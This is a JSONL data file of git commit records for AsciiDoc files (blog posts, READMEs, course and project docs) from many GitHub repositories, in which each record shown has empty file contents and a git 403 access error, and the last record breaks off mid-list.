{"commit":"cd1255ec8eca5a6a4533e5bbc8f1a5bacb5371ac","subject":"Expansion pair toString","message":"Expansion pair toString\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f594080c4c2caee9e3d4c1f93097086a48a69df0","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"df5293271556d4db887374cd9df6278aa0c6ee86","subject":"..\/_posts\/2016-08-25-Dorset.adoc","message":"..\/_posts\/2016-08-25-Dorset.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-08-25-Dorset.adoc","new_file":"_posts\/2016-08-25-Dorset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"960d9cc7b3cda1e78b8f8bd76b86856e841c35be","subject":"Update 2016-04-05-Bienvenue.adoc","message":"Update 2016-04-05-Bienvenue.adoc","repos":"philippevidal80\/blog,philippevidal80\/blog,philippevidal80\/blog,philippevidal80\/blog","old_file":"_posts\/2016-04-05-Bienvenue.adoc","new_file":"_posts\/2016-04-05-Bienvenue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/philippevidal80\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"aa8183c92f0ba02962a650828c2bd93796d3ff3c","subject":"Update 2018-05-14-Spacemacs.adoc","message":"Update 2018-05-14-Spacemacs.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2018-05-14-Spacemacs.adoc","new_file":"_posts\/2018-05-14-Spacemacs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c9e030cba45e5d9223ee1ee1388e177f3b0c3134","subject":"Add documentation of a simple client side integration for gathering the data required to execute checkout integration tests","message":"Add documentation of a simple client side integration for gathering the data required to execute checkout integration tests\n","repos":"BroadleafCommerce\/blc-paypal","old_file":"docs\/src\/main\/asciidoc\/SimplePayPalButtonIntegration.adoc","new_file":"docs\/src\/main\/asciidoc\/SimplePayPalButtonIntegration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BroadleafCommerce\/blc-paypal.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"d46cadc89c0c22fe972aa299ccfe49ff234b3428","subject":"y2b create post Saints Row The Third Platinum Pack Unboxing","message":"y2b create post Saints Row The Third Platinum Pack Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-15-Saints-Row-The-Third-Platinum-Pack-Unboxing.adoc","new_file":"_posts\/2011-11-15-Saints-Row-The-Third-Platinum-Pack-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c445e591756dd798470a62beb75e8feba7f4d0d0","subject":"Add FIP64 operations guide","message":"Add FIP64 operations guide\n\nThis includes FIP64 overview and quick-start setup\/tear-down\nsteps.\n\nRef: MI-1922\n\nChange-Id: Ib95c208d1d5ace9af103f19162158f1fddd509ce\nSigned-off-by: Alex Bikfalvi <744025bc2ba0a62d69eb014a214efecdc8547c69@midokura.com>\n","repos":"midonet\/midonet-docs,midonet\/midonet-docs,midonet\/midonet-docs,midonet\/midonet-docs","old_file":"docs\/operation-guide\/src\/fip64\/chapter_fip64_en.adoc","new_file":"docs\/operation-guide\/src\/fip64\/chapter_fip64_en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/midonet\/midonet-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"901daeb702af51fbf93f150187f597c01183a4cd","subject":"y2b create post This Painful Gadget Kills Your Bad Habits","message":"y2b create post This Painful Gadget Kills Your Bad Habits","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-11-This-Painful-Gadget-Kills-Your-Bad-Habits.adoc","new_file":"_posts\/2016-07-11-This-Painful-Gadget-Kills-Your-Bad-Habits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9a6ccd2e247ab6bcfe92237198a2782bb35c7790","subject":"update httpd post","message":"update httpd post\n","repos":"jbosschina\/openshift-cookbooks","old_file":"linux\/svc\/httpd.adoc","new_file":"linux\/svc\/httpd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"5f447fe871d3b8922af2e576468c7f9d0631bb1a","subject":"Update 2015-05-01-Mein-erster-Eintrag.adoc","message":"Update 2015-05-01-Mein-erster-Eintrag.adoc","repos":"pointout\/pointout.github.io,pointout\/pointout.github.io,pointout\/pointout.github.io","old_file":"_posts\/2015-05-01-Mein-erster-Eintrag.adoc","new_file":"_posts\/2015-05-01-Mein-erster-Eintrag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pointout\/pointout.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ba491371ce150a613895165b823ee0f1b10307e7","subject":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","message":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0f2434e1e11a7aa8cac0f773dcf7b18592c729dc","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"437980211aa382b403fa1f6aa9348a5c356e2c84","subject":"NEW scenarios for long time running system tests","message":"NEW scenarios for long time running system tests\n","repos":"jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design_docs\/systemtests\/longtime-tests\/scenarios.adoc","new_file":"documentation\/design_docs\/systemtests\/longtime-tests\/scenarios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"b1e42090a2ec4106d654b287977f63436fa61ace","subject":"readme1","message":"readme1\n","repos":"codezork\/BlueNodes,codezork\/BlueNodes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codezork\/BlueNodes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"5a5aeae923028909ef7b6721312d5ee3b3aafa2b","subject":"Minor typo in readme","message":"Minor typo in readme\n","repos":"hawkular\/hawkular-alerts,lucasponce\/hawkular-alerts,lucasponce\/hawkular-alerts,hawkular\/hawkular-alerts,lucasponce\/hawkular-alerts,tsegismont\/hawkular-alerts,tsegismont\/hawkular-alerts,hawkular\/hawkular-alerts,lucasponce\/hawkular-alerts,hawkular\/hawkular-alerts,jsanda\/hawkular-alerts,jsanda\/hawkular-alerts,jpkrohling\/hawkular-alerts,jpkrohling\/hawkular-alerts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lucasponce\/hawkular-alerts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"2ee5ecc964458cf4c0864cd25fcf67730416ac7d","subject":"converted to asciidoc and added deprecation notice.","message":"converted to asciidoc and added deprecation notice.\n","repos":"m-m-m\/persistence","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/persistence.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"e8ded7523e49dffb67eeebe09fbfbb80c1f97b9d","subject":"Create README.adoc","message":"Create README.adoc","repos":"carloslozano\/docToolchain,carloslozano\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,carloslozano\/docToolchain","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"86c4baf57addd6b86a18f8ceab6d87b75047db09","subject":"Delete the file at '_posts\/2019-01-31-Titre.adoc'","message":"Delete the file at '_posts\/2019-01-31-Titre.adoc'","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2019-01-31-Titre.adoc","new_file":"_posts\/2019-01-31-Titre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e4b7662ea516b0509973bbb418c35fe439bbeaf1","subject":"Added tutorial","message":"Added tutorial","repos":"NorbertSandor\/xtend-ioc","old_file":"xtend-ioc-project\/xtend-ioc-website\/src\/main\/asciidoc\/tutorials.asciidoc","new_file":"xtend-ioc-project\/xtend-ioc-website\/src\/main\/asciidoc\/tutorials.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NorbertSandor\/xtend-ioc.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"}
{"commit":"fffd9172ad981753a59f0a7c1b2abfd295bf991b","subject":"Updated notes about copy semantics and move semantics","message":"Updated notes about copy semantics and move semantics\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"08e5c3ddf9bd6a3f679a753b1cf0eaffa35e2375","subject":"Revised mutable section","message":"Revised mutable section\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"60763ed697c719a3b314226170026339408d4c67","subject":"added HXE getting started guide","message":"added HXE getting started guide\n","repos":"tbludau\/ansible-hana-sysprep","old_file":"docs\/getting-started-HXE.adoc","new_file":"docs\/getting-started-HXE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tbludau\/ansible-hana-sysprep.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"4a65525c20e2cb495c48fd6f66c392a76e1ecd59","subject":"y2b create post Duke Nukem Balls of Steel WINNER!","message":"y2b create post Duke Nukem Balls of Steel WINNER!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-18-Duke-Nukem-Balls-of-Steel-WINNER.adoc","new_file":"_posts\/2011-07-18-Duke-Nukem-Balls-of-Steel-WINNER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"875cc548bd7b836631bd07e6a7ed5c72e2734f02","subject":"y2b create post Samsung Transparent Smart Window","message":"y2b create post Samsung Transparent Smart Window","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-11-Samsung-Transparent-Smart-Window.adoc","new_file":"_posts\/2012-01-11-Samsung-Transparent-Smart-Window.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9f38705ac60f0e0f94aa9564c3b280ddebaaa20d","subject":"Update 2015-07-14-Hanging-Up-My-Hat.adoc","message":"Update 2015-07-14-Hanging-Up-My-Hat.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2015-07-14-Hanging-Up-My-Hat.adoc","new_file":"_posts\/2015-07-14-Hanging-Up-My-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b860f2b094823cc827b34e0fda4c53cbf8dc33c0","subject":"Update 2015-07-21-Ideen-fur-Posts.adoc","message":"Update 2015-07-21-Ideen-fur-Posts.adoc","repos":"nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io","old_file":"_posts\/2015-07-21-Ideen-fur-Posts.adoc","new_file":"_posts\/2015-07-21-Ideen-fur-Posts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nobodysplace\/nobodysplace.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a07adbc84be77cbc111f75af7e93bbccbfb1186a","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"3c1b2d88aed1047c555674dc0b14c32b44cf4052","subject":"y2b create post LunaTik iPod Nano Watch Strap Unboxing \\u0026 Review","message":"y2b create post LunaTik iPod Nano Watch Strap Unboxing \\u0026 Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-08-LunaTik-iPod-Nano-Watch-Strap-Unboxing-u0026-Review.adoc","new_file":"_posts\/2011-10-08-LunaTik-iPod-Nano-Watch-Strap-Unboxing-u0026-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2beefa90a5693a0ef9be11cb324a01b3696f7a0d","subject":"Fix file link","message":"Fix file link\n","repos":"mstahv\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,asashour\/framework,mstahv\/framework","old_file":"documentation\/articles\/IntegratingAJavaScriptLibraryAsAnExtension.asciidoc","new_file":"documentation\/articles\/IntegratingAJavaScriptLibraryAsAnExtension.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"5fd484f69c36fd46a09e2ade8687754f3f5ed61c","subject":"Update 2017-08-14-All-India-Convention-for-Students-Struggles-Bangalor.adoc","message":"Update 2017-08-14-All-India-Convention-for-Students-Struggles-Bangalor.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-08-14-All-India-Convention-for-Students-Struggles-Bangalor.adoc","new_file":"_posts\/2017-08-14-All-India-Convention-for-Students-Struggles-Bangalor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"6b030de839e916501570375765fbb3c81b3c92fd","subject":"Update 2015-03-12-Hello-World.adoc","message":"Update 2015-03-12-Hello-World.adoc\n","repos":"filipeuva\/filipeuva.blog,filipeuva\/filipeuva.blog,filipeuva\/filipeuva.blog","old_file":"_posts\/2015-03-12-Hello-World.adoc","new_file":"_posts\/2015-03-12-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/filipeuva\/filipeuva.blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"90e88e4e5e43628965f943d2a7db7d69f9140575","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e34b35ea130d9d5bfa87dab79b2819f99746f1f2","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"69a5bea702a2ce36c82795deb9363399a0763e98","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ff7af5f1a2a45c83f5de9720780c0f65bed98747","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update
2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f889cb4d585e3b1447e523e06e90fd7cbb8cba88","subject":"Update getting-started.adoc","message":"Update getting-started.adoc\n\nFixed path for bash completions\n\nCloses gh-5831\n","repos":"lexandro\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,hello2009chen\/spring-boot,i007422\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,akmaharshi\/jenkins,joshiste\/spring-boot,qerub\/spring-boot,dreis2211\/spring-boot,wilkinsona\/spring-boot,bjornlindstrom\/spring-boot,htynkn\/spring-boot,kamilszymanski\/spring-boot,habuma\/spring-boot,yhj630520\/spring-boot,isopov\/spring-boot,michael-simons\/spring-boot,linead\/spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,drumonii\/spring-boot,cleverjava\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,ptahchiev\/spring-boot,felipeg48\/spring-boot,lexandro\/spring-boot,donhuvy\/spring-boot,cleverjava\/jenkins2-course-spring-boot,zhanhb\/spring-boot,jbovet\/spring-boot,shangyi0102\/spring-boot,Buzzardo\/spring-boot,dreis2211\/spring-boot,SaravananParthasarathy\/SPSDemo,isopov\/spring-boot,mbenson\/spring-boot,scottfrederick\/spring-boot,linead\/spring-boot,shakuzen\/spring-boot,isopov\/spring-boot,dreis2211\/spring-boot,cleverjava\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,hello2009chen\/spring-boot,joshthornhill\/spring-boot,xiaoleiPENG\/my-project,bclozel\/spring-boot,Buzzardo\/spring-boot,brettwooldridge\/spring-boot,mbenson\/spring-boot,rweisleder\/spring-boot,RichardCSantana\/spring-boot,kamilszymanski\/spring-boot,ihoneymon\/spring-boot,hello2009chen\/spring-boot,mdeinum\/spring-boot,bijukunjummen\/spring-boot,jxblum\/spring-boot,lburgazzoli\/spring-boot,isopov\/spring-boot,joshiste\/spring-boot,habuma\/spring-boot,htynkn\/spring-boot,tsachev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,nebhale\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,hqrt\/jenkins2-course-spring-boot,royclarkson\/spring-boot,lexandro\/spring-boot,pvorb\/spring-boot,brettwooldridge\/spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,afroje-reshma\/spring-boot-sample,habuma\/spring-boot,sbcoba\/spring-boot,jayarampradhan\/spring-boot,felipeg48\/spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,bjornlindstrom\/spring-boot,afroje-reshma\/spring-boot-sample,rajendra-chola\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,Nowheresly\/spring-boot,habuma\/spring-boot,akmaharshi\/jenkins,philwebb\/spring-boot,candrews\/spring-boot,spring-projects\/spring-boot,herau\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,DeezCashews\/spring-boot,sbcoba\/spring-boot,tiarebalbi\/spring-boot,jayarampradhan\/spring-boot,hello2009chen\/spring-boot,vakninr\/spring-boot,kamilszymanski\/spring-boot,mosoft521\/spring-boot,kdvolder\/spring-boot,royclarkson\/spring-boot,ollie314
\/spring-boot,tiarebalbi\/spring-boot,sbcoba\/spring-boot,drumonii\/spring-boot,akmaharshi\/jenkins,mevasaroj\/jenkins2-course-spring-boot,lexandro\/spring-boot,wilkinsona\/spring-boot,bbrouwer\/spring-boot,vakninr\/spring-boot,qerub\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,eddumelendez\/spring-boot,hqrt\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,minmay\/spring-boot,xiaoleiPENG\/my-project,jvz\/spring-boot,bclozel\/spring-boot,michael-simons\/spring-boot,sebastiankirsch\/spring-boot,herau\/spring-boot,DeezCashews\/spring-boot,shakuzen\/spring-boot,yangdd1205\/spring-boot,lucassaldanha\/spring-boot,wilkinsona\/spring-boot,candrews\/spring-boot,tiarebalbi\/spring-boot,xiaoleiPENG\/my-project,olivergierke\/spring-boot,ihoneymon\/spring-boot,philwebb\/spring-boot,nebhale\/spring-boot,spring-projects\/spring-boot,shakuzen\/spring-boot,ollie314\/spring-boot,joshiste\/spring-boot,rweisleder\/spring-boot,ptahchiev\/spring-boot,pvorb\/spring-boot,mosoft521\/spring-boot,SaravananParthasarathy\/SPSDemo,mdeinum\/spring-boot,jxblum\/spring-boot,joshthornhill\/spring-boot,Buzzardo\/spring-boot,i007422\/jenkins2-course-spring-boot,herau\/spring-boot,yhj630520\/spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,chrylis\/spring-boot,zhanhb\/spring-boot,SaravananParthasarathy\/SPSDemo,NetoDevel\/spring-boot,DeezCashews\/spring-boot,ilayaperumalg\/spring-boot,afroje-reshma\/spring-boot-sample,nebhale\/spring-boot,olivergierke\/spring-boot,jbovet\/spring-boot,xiaoleiPENG\/my-project,joshthornhill\/spring-boot,RichardCSantana\/spring-boot,rweisleder\/spring-boot,SaravananParthasarathy\/SPSDemo,philwebb\/spring-boot,jbovet\/spring-boot,eddumelendez\/spring-boot,jxblum\/spring-boot,mosoft521\/spring-boot,mosoft521\/spring-boot,jayarampradhan\/spring-boot,candrews\/spring-boot,minmay\/spring-boot,ilayaperumalg\/spring-boot,yhj630520\/spring-boot,RichardCSantana\/spring-boot,herau\/spring-boot,hqrt\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,wilkinsona\/spring-boot,htynkn\/spring-boot,lburgazzoli\/spring-boot,brettwooldridge\/spring-boot,htynkn\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jbovet\/spring-boot,vpavic\/spring-boot,DeezCashews\/spring-boot,lexandro\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,shakuzen\/spring-boot,bijukunjummen\/spring-boot,Nowheresly\/spring-boot,deki\/spring-boot,brettwooldridge\/spring-boot,philwebb\/spring-boot-concourse,minmay\/spring-boot,bjornlindstrom\/spring-boot,lucassaldanha\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,kdvolder\/spring-boot,candrews\/spring-boot,lucassaldanha\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kdvolder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,nebhale\/spring-boot,tsachev\/spring-boot,hello2009chen\/spring-boot,olivergierke\/spring-boot,eddumelendez\/spring-boot,cleverjava\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,i007422\/jenkins2-course-spring-boot,mbenson\/spring-boot,sebastiankirsch\/spring-boot,felipeg48\/spring-boot,spring-projects\/spring-boot,bbrouwer\/spring-boot,philwebb\/spring-boot-concourse,thomasdarimont\/spring-boot,royclarkson\/spring-boot,chrylis\/spring-boot,shangyi0102\/spring-boot,ihoneymon\/spring-boot,mdeinum\/spring-boot,jvz\/spring-b